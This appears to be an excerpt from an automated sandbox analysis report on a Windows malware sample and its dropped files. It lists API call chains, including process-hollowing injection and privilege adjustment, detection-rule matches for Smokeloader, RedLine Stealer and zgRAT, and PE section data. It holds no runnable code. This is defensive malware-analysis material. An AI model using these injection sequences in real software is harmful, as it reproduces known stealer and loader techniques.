Source: C:\Users\user\Desktop\uVQLD8YVk6.exe	Code function: 0_2_004014C8 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_004014C8
Source: C:\Users\user\Desktop\uVQLD8YVk6.exe	Code function: 0_2_004022D3 NtQuerySystemInformation,	0_2_004022D3
Source: C:\Users\user\Desktop\uVQLD8YVk6.exe	Code function: 0_2_004022D5 NtQuerySystemInformation,NtQueryInformationProcess,	0_2_004022D5
Source: C:\Users\user\Desktop\uVQLD8YVk6.exe	Code function: 0_2_004022EA NtQuerySystemInformation,	0_2_004022EA
Source: C:\Users\user\Desktop\uVQLD8YVk6.exe	Code function: 0_2_004022F1 NtQuerySystemInformation,	0_2_004022F1
Source: C:\Users\user\Desktop\uVQLD8YVk6.exe	Code function: 0_2_0040149E NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_0040149E
Source: C:\Users\user\Desktop\uVQLD8YVk6.exe	Code function: 0_2_004014AC NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_004014AC
Source: C:\Users\user\Desktop\uVQLD8YVk6.exe	Code function: 0_2_004014B3 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_004014B3
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 14_2_005C0110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,	14_2_005C0110
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 17_2_0040180C Sleep,NtTerminateProcess,	17_2_0040180C
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 17_2_00401818 Sleep,NtTerminateProcess,	17_2_00401818
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 17_2_00401822 Sleep,NtTerminateProcess,	17_2_00401822
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 17_2_00401826 Sleep,NtTerminateProcess,	17_2_00401826
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 17_2_00401834 Sleep,NtTerminateProcess,	17_2_00401834
Source: C:\Users\user\AppData\Local\Temp\is-U9MHE.tmp\tuc4.tmp	Code function: 23_2_00423B94 NtdllDefWindowProc_A,	23_2_00423B94
Source: C:\Users\user\AppData\Local\Temp\is-U9MHE.tmp\tuc4.tmp	Code function: 23_2_004125E8 NtdllDefWindowProc_A,	23_2_004125E8
Source: C:\Users\user\AppData\Local\Temp\is-U9MHE.tmp\tuc4.tmp	Code function: 23_2_0045687C PostMessageA,PostMessageA,SetForegroundWindow,NtdllDefWindowProc_A,	23_2_0045687C
Source: C:\Users\user\AppData\Local\Temp\is-U9MHE.tmp\tuc4.tmp	Code function: 23_2_0042F394 NtdllDefWindowProc_A,	23_2_0042F394
Source: C:\Users\user\AppData\Local\Temp\is-U9MHE.tmp\tuc4.tmp	Code function: 23_2_004776C4 NtdllDefWindowProc_A,	23_2_004776C4

Source: C:\Users\user\AppData\Local\Temp\is-U9MHE.tmp\tuc4.tmp

Code function: 23_2_0042E7A8: CreateFileA,DeviceIoControl,GetLastError,CloseHandle,SetLastError,

23_2_0042E7A8

Source: C:\Users\user\AppData\Local\Temp\InstallSetup8.exe	Code function: 10_2_00403532 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,	10_2_00403532
Source: C:\Users\user\AppData\Local\Temp\InstallSetup8.exe	Code function: 13_2_00403532 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,	13_2_00403532
Source: C:\Users\user\AppData\Local\Temp\tuc4.exe	Code function: 18_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,	18_2_00409448
Source: C:\Users\user\AppData\Local\Temp\etopt.exe	Code function: 21_2_00403382 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrlenA,wsprintfA,GetFileAttributesA,DeleteFileA,SetCurrentDirectoryA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,	21_2_00403382
Source: C:\Users\user\AppData\Local\Temp\is-U9MHE.tmp\tuc4.tmp	Code function: 23_2_00454B00 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,	23_2_00454B00

Source: C:\Users\user\AppData\Local\Temp\etopt.exe

File created: C:\Windows\servicing\Editions\RTFCtrl.dll

Source: C:\Users\user\Desktop\uVQLD8YVk6.exe	Code function: 0_2_00402408	0_2_00402408
Source: C:\Users\user\Desktop\uVQLD8YVk6.exe	Code function: 0_2_00402539	0_2_00402539
Source: C:\Users\user\Desktop\uVQLD8YVk6.exe	Code function: 0_2_004023C4	0_2_004023C4
Source: C:\Users\user\Desktop\uVQLD8YVk6.exe	Code function: 0_2_004023CF	0_2_004023CF
Source: C:\Users\user\Desktop\uVQLD8YVk6.exe	Code function: 0_2_004023EE	0_2_004023EE
Source: C:\Users\user\Desktop\uVQLD8YVk6.exe	Code function: 0_2_004023F6	0_2_004023F6
Source: C:\Users\user\AppData\Local\Temp\4854.exe	Code function: 4_2_6CE4B6B0	4_2_6CE4B6B0
Source: C:\Users\user\AppData\Local\Temp\4854.exe	Code function: 4_2_6CE9AC29	4_2_6CE9AC29
Source: C:\Users\user\AppData\Local\Temp\4854.exe	Code function: 4_2_6CE42D70	4_2_6CE42D70
Source: C:\Users\user\AppData\Local\Temp\4854.exe	Code function: 4_2_6CE74EE0	4_2_6CE74EE0
Source: C:\Users\user\AppData\Local\Temp\4854.exe	Code function: 4_2_6CE64970	4_2_6CE64970
Source: C:\Users\user\AppData\Local\Temp\4854.exe	Code function: 4_2_6CE64AC0	4_2_6CE64AC0
Source: C:\Users\user\AppData\Local\Temp\4854.exe	Code function: 4_2_6CE90B89	4_2_6CE90B89
Source: C:\Users\user\AppData\Local\Temp\4854.exe	Code function: 4_2_6CE28B30	4_2_6CE28B30
Source: C:\Users\user\AppData\Local\Temp\4854.exe	Code function: 4_2_6CE9A54D	4_2_6CE9A54D
Source: C:\Users\user\AppData\Local\Temp\4854.exe	Code function: 4_2_6CE64550	4_2_6CE64550
Source: C:\Users\user\AppData\Local\Temp\4854.exe	Code function: 4_2_6CE26650	4_2_6CE26650
Source: C:\Users\user\AppData\Local\Temp\4854.exe	Code function: 4_2_6CE2A7E0	4_2_6CE2A7E0
Source: C:\Users\user\AppData\Local\Temp\4854.exe	Code function: 4_2_6CE2C7B0	4_2_6CE2C7B0
Source: C:\Users\user\AppData\Local\Temp\4854.exe	Code function: 4_2_6CE3A0C0	4_2_6CE3A0C0
Source: C:\Users\user\AppData\Local\Temp\4854.exe	Code function: 4_2_6CE763B0	4_2_6CE763B0
Source: C:\Users\user\AppData\Local\Temp\4854.exe	Code function: 4_2_6CE82310	4_2_6CE82310
Source: C:\Users\user\AppData\Local\Temp\4854.exe	Code function: 4_2_6CE81CA0	4_2_6CE81CA0
Source: C:\Users\user\AppData\Local\Temp\4854.exe	Code function: 4_2_6CE63C90	4_2_6CE63C90
Source: C:\Users\user\AppData\Local\Temp\4854.exe	Code function: 4_2_6CE75DD0	4_2_6CE75DD0
Source: C:\Users\user\AppData\Local\Temp\4854.exe	Code function: 4_2_6CE95DD2	4_2_6CE95DD2
Source: C:\Users\user\AppData\Local\Temp\4854.exe	Code function: 4_2_6CE75EB9	4_2_6CE75EB9
Source: C:\Users\user\AppData\Local\Temp\4854.exe	Code function: 4_2_6CE63E50	4_2_6CE63E50
Source: C:\Users\user\AppData\Local\Temp\4854.exe	Code function: 4_2_6CE99FFC	4_2_6CE99FFC
Source: C:\Users\user\AppData\Local\Temp\4854.exe	Code function: 4_2_6CE9BFF1	4_2_6CE9BFF1
Source: C:\Users\user\AppData\Local\Temp\4854.exe	Code function: 4_2_6CE758D7	4_2_6CE758D7
Source: C:\Users\user\AppData\Local\Temp\4854.exe	Code function: 4_2_6CE758D5	4_2_6CE758D5
Source: C:\Users\user\AppData\Local\Temp\4854.exe	Code function: 4_2_6CE75830	4_2_6CE75830
Source: C:\Users\user\AppData\Local\Temp\4854.exe	Code function: 4_2_6CE9B964	4_2_6CE9B964
Source: C:\Users\user\AppData\Local\Temp\4854.exe	Code function: 4_2_6CE99AAB	4_2_6CE99AAB
Source: C:\Users\user\AppData\Local\Temp\4854.exe	Code function: 4_2_6CE63460	4_2_6CE63460
Source: C:\Users\user\AppData\Local\Temp\4854.exe	Code function: 4_2_6CE75050	4_2_6CE75050
Source: C:\Users\user\AppData\Local\Temp\4854.exe	Code function: 4_2_6CE63260	4_2_6CE63260
Source: C:\Users\user\AppData\Local\Temp\4854.exe	Code function: 4_2_6CE75274	4_2_6CE75274
Source: C:\Users\user\AppData\Local\Temp\4854.exe	Code function: 4_2_058376C7	4_2_058376C7
Source: C:\Users\user\AppData\Local\Temp\4854.exe	Code function: 4_2_058376D8	4_2_058376D8
Source: C:\Users\user\AppData\Local\Temp\4854.exe	Code function: 4_2_05837980	4_2_05837980
Source: C:\Users\user\AppData\Local\Temp\4854.exe	Code function: 4_2_05837990	4_2_05837990
Source: C:\Users\user\AppData\Local\Temp\4854.exe	Code function: 4_2_07E526F8	4_2_07E526F8
Source: C:\Users\user\AppData\Local\Temp\4854.exe	Code function: 4_2_07E50EB3	4_2_07E50EB3
Source: C:\Users\user\AppData\Local\Temp\4854.exe	Code function: 4_2_07E526DC	4_2_07E526DC
Source: C:\Users\user\AppData\Local\Temp\4854.exe	Code function: 4_2_07E50930	4_2_07E50930
Source: C:\Users\user\AppData\Local\Temp\4854.exe	Code function: 4_2_07E6BD59	4_2_07E6BD59
Source: C:\Users\user\AppData\Local\Temp\4854.exe	Code function: 4_2_07E68AF8	4_2_07E68AF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01090848	8_2_01090848
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01091B68	8_2_01091B68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01090838	8_2_01090838
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01091B59	8_2_01091B59
Source: C:\Users\user\AppData\Local\Temp\InstallSetup8.exe	Code function: 10_2_00406DC6	10_2_00406DC6
Source: C:\Users\user\AppData\Local\Temp\InstallSetup8.exe	Code function: 10_2_0040759D	10_2_0040759D
Source: C:\Users\user\AppData\Local\Temp\InstallSetup8.exe	Code function: 13_2_00406DC6	13_2_00406DC6
Source: C:\Users\user\AppData\Local\Temp\InstallSetup8.exe	Code function: 13_2_0040759D	13_2_0040759D
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 14_2_00410879	14_2_00410879
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 14_2_004080DD	14_2_004080DD
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 14_2_0042A8FB	14_2_0042A8FB
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 14_2_0041614B	14_2_0041614B
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 14_2_0042B1E6	14_2_0042B1E6
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 14_2_004189FA	14_2_004189FA
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 14_2_00419ACF	14_2_00419ACF
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 14_2_00428A9E	14_2_00428A9E
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 14_2_004192A3	14_2_004192A3
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 14_2_00404B45	14_2_00404B45
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 14_2_00403B72	14_2_00403B72
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 14_2_0042A3B7	14_2_0042A3B7
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 14_2_0042B4EB	14_2_0042B4EB
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 14_2_0042BCAF	14_2_0042BCAF
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 14_2_0042E56B	14_2_0042E56B
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 14_2_00418ECF	14_2_00418ECF
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 14_2_00429E8C	14_2_00429E8C
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 14_2_004196AF	14_2_004196AF
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 14_2_0042AF6B	14_2_0042AF6B
Source: C:\Users\user\AppData\Local\Temp\tuc4.exe	Code function: 18_2_0040840C	18_2_0040840C
Source: C:\Users\user\AppData\Local\Temp\88D9.exe	Code function: 19_2_014A2338	19_2_014A2338
Source: C:\Users\user\AppData\Local\Temp\etopt.exe	Code function: 21_2_00406953	21_2_00406953
Source: C:\Users\user\AppData\Local\Temp\is-U9MHE.tmp\tuc4.tmp	Code function: 23_2_004301D0	23_2_004301D0
Source: C:\Users\user\AppData\Local\Temp\is-U9MHE.tmp\tuc4.tmp	Code function: 23_2_004442C4	23_2_004442C4
Source: C:\Users\user\AppData\Local\Temp\is-U9MHE.tmp\tuc4.tmp	Code function: 23_2_0048C28C	23_2_0048C28C
Source: C:\Users\user\AppData\Local\Temp\is-U9MHE.tmp\tuc4.tmp	Code function: 23_2_0045E8DC	23_2_0045E8DC
Source: C:\Users\user\AppData\Local\Temp\is-U9MHE.tmp\tuc4.tmp	Code function: 23_2_0045A984	23_2_0045A984
Source: C:\Users\user\AppData\Local\Temp\is-U9MHE.tmp\tuc4.tmp	Code function: 23_2_004449BC	23_2_004449BC
Source: C:\Users\user\AppData\Local\Temp\is-U9MHE.tmp\tuc4.tmp	Code function: 23_2_00434B1C	23_2_00434B1C
Source: C:\Users\user\AppData\Local\Temp\is-U9MHE.tmp\tuc4.tmp	Code function: 23_2_00466BAC	23_2_00466BAC
Source: C:\Users\user\AppData\Local\Temp\is-U9MHE.tmp\tuc4.tmp	Code function: 23_2_00468C34	23_2_00468C34
Source: C:\Users\user\AppData\Local\Temp\is-U9MHE.tmp\tuc4.tmp	Code function: 23_2_00430D5C	23_2_00430D5C
Source: C:\Users\user\AppData\Local\Temp\is-U9MHE.tmp\tuc4.tmp	Code function: 23_2_00444DC8	23_2_00444DC8
Source: C:\Users\user\AppData\Local\Temp\is-U9MHE.tmp\tuc4.tmp	Code function: 23_2_00485050	23_2_00485050
Source: C:\Users\user\AppData\Local\Temp\is-U9MHE.tmp\tuc4.tmp	Code function: 23_2_0045101C	23_2_0045101C
Source: C:\Users\user\AppData\Local\Temp\is-U9MHE.tmp\tuc4.tmp	Code function: 23_2_0047F134	23_2_0047F134
Source: C:\Users\user\AppData\Local\Temp\is-U9MHE.tmp\tuc4.tmp	Code function: 23_2_0043D5A4	23_2_0043D5A4
Source: C:\Users\user\AppData\Local\Temp\is-U9MHE.tmp\tuc4.tmp	Code function: 23_2_0046F7D8	23_2_0046F7D8
Source: C:\Users\user\AppData\Local\Temp\is-U9MHE.tmp\tuc4.tmp	Code function: 23_2_00443D1C	23_2_00443D1C
Source: C:\Users\user\AppData\Local\Temp\is-U9MHE.tmp\tuc4.tmp	Code function: 23_2_00433E18	23_2_00433E18
Source: C:\Users\user\AppData\Local\Temp\is-U9MHE.tmp\tuc4.tmp	Code function: 23_2_00485F84	23_2_00485F84

Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: String function: 00403888 appears 55 times
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: String function: 00409CDB appears 39 times
Source: C:\Users\user\AppData\Local\Temp\4854.exe	Code function: String function: 6CE8D520 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\4854.exe	Code function: String function: 6CE890D8 appears 51 times
Source: C:\Users\user\AppData\Local\Temp\4854.exe	Code function: String function: 6CE89B35 appears 141 times
Source: C:\Users\user\AppData\Local\Temp\InstallSetup8.exe	Code function: String function: 00402DAB appears 51 times
Source: C:\Users\user\AppData\Local\Temp\is-U9MHE.tmp\tuc4.tmp	Code function: String function: 004458F8 appears 59 times
Source: C:\Users\user\AppData\Local\Temp\is-U9MHE.tmp\tuc4.tmp	Code function: String function: 00405964 appears 110 times
Source: C:\Users\user\AppData\Local\Temp\is-U9MHE.tmp\tuc4.tmp	Code function: String function: 00445628 appears 45 times
Source: C:\Users\user\AppData\Local\Temp\is-U9MHE.tmp\tuc4.tmp	Code function: String function: 00408C14 appears 45 times
Source: C:\Users\user\AppData\Local\Temp\is-U9MHE.tmp\tuc4.tmp	Code function: String function: 00406ACC appears 39 times
Source: C:\Users\user\AppData\Local\Temp\is-U9MHE.tmp\tuc4.tmp	Code function: String function: 00403400 appears 61 times
Source: C:\Users\user\AppData\Local\Temp\is-U9MHE.tmp\tuc4.tmp	Code function: String function: 00433D30 appears 32 times
Source: C:\Users\user\AppData\Local\Temp\is-U9MHE.tmp\tuc4.tmp	Code function: String function: 00456FF8 appears 93 times
Source: C:\Users\user\AppData\Local\Temp\is-U9MHE.tmp\tuc4.tmp	Code function: String function: 00457204 appears 70 times
Source: C:\Users\user\AppData\Local\Temp\is-U9MHE.tmp\tuc4.tmp	Code function: String function: 004078FC appears 43 times
Source: C:\Users\user\AppData\Local\Temp\is-U9MHE.tmp\tuc4.tmp	Code function: String function: 00403494 appears 82 times
Source: C:\Users\user\AppData\Local\Temp\is-U9MHE.tmp\tuc4.tmp	Code function: String function: 004529A4 appears 91 times
Source: C:\Users\user\AppData\Local\Temp\is-U9MHE.tmp\tuc4.tmp	Code function: String function: 00403684 appears 218 times

Source: uVQLD8YVk6.exe

Static PE information: No import functions for PE file found

Source: C:\Windows\explorer.exe

Section loaded: taskschd.dll

Jump to behavior

Source: uVQLD8YVk6.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: 35.2.CFAA.exe.2f0000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 4.0.4854.exe.aa0000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 31.2.nsa984B.tmp.exe.8b0e67.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000003.00000002.1918764869.0000000002080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000011.00000002.2145002254.0000000000500000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000000F.00000002.2702934288.0000000002A89000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.1676508085.00000000004F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000011.00000002.2145323149.0000000001F61000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000000E.00000002.2067327627.00000000006BC000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.1676415097.00000000001F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000001F.00000002.3074108822.00000000009FC000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000001F.00000002.3071615615.00000000008B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000003.00000002.1919452397.00000000020A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000000F.00000002.2724435477.0000000002E90000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23

Source: uVQLD8YVk6.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: C086.exe.1.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 88D9.exe.1.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: uVQLD8YVk6.exe

Static PE information: Section .text

Source: CFAA.exe.1.dr

Static PE information: Section: ZLIB complexity 0.9906572164948454

Source: C086.exe.1.dr, Redist.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: C086.exe.1.dr, Redist.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: classification engine

Classification label: mal100.troj.adwa.spyw.expl.evad.winEXE@77/432@11/19

Source: C:\Users\user\AppData\Local\Temp\InstallSetup8.exe	Code function: 10_2_00403532 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,	10_2_00403532
Source: C:\Users\user\AppData\Local\Temp\InstallSetup8.exe	Code function: 13_2_00403532 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,	13_2_00403532
